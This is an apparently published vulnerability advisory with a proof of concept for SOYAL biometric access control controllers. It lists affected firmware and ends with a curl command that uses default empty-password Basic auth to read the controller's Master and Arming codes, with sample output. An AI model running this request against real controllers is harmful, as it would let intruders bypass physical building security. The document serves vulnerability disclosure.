53 lines
No EOL
2 KiB
Text
53 lines
No EOL
2 KiB
Text
# Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
|
|
# Date: 25.01.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
|
|
|
|
Vendor: SOYAL Technology Co., Ltd
|
|
Product web page: https://www.soyal.com.tw | https://www.soyal.com
|
|
Affected version: AR-727 i/CM - F/W: 5.0
|
|
AR837E/EF - F/W: 4.3
|
|
AR725Ev2 - F/W: 4.3 191231
|
|
AR331/725E - F/W: 4.2
|
|
AR837E/EF - F/W: 4.1
|
|
AR-727CM /i - F/W: 4.09
|
|
AR-727CM /i - F/W: 4.06
|
|
AR-837E - F/W: 3.03
|
|
|
|
Summary: Soyal Access systems are built into Raytel Door Entry Systems
|
|
and are providing access and lift control to many buildings from public
|
|
and private apartment blocks to prestigious public buildings.
|
|
|
|
Desc: The controller suffers from a cleartext transmission of sensitive
|
|
information. This allows interception of the HTTP traffic and disclose
|
|
the Master code and the Arming code via a man-in-the-middle attack. An
|
|
attacker can obtain these codes to enter into the controller's Programming
|
|
mode and bypass physical security controls in place.
|
|
|
|
Tested on: SOYAL Technology WebServer 2.0
|
|
SOYAL Serial Device Server 4.03A
|
|
SOYAL Serial Device Server 4.01n
|
|
SOYAL Serial Device Server 3.07n
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5630
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php
|
|
|
|
|
|
25.01.2021
|
|
|
|
--
|
|
|
|
|
|
$ curl 'http://192.168.1.1/CtrlParam.htm' \
|
|
-H 'Authorization: Basic YWRtaW46' | \
|
|
grep -ni -B1 'masterCode\|armCode'
|
|
|
|
<td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>
|
|
<td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr>
|
|
<td>Arming Code (4 Digital) </td>
|
|
<td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr> |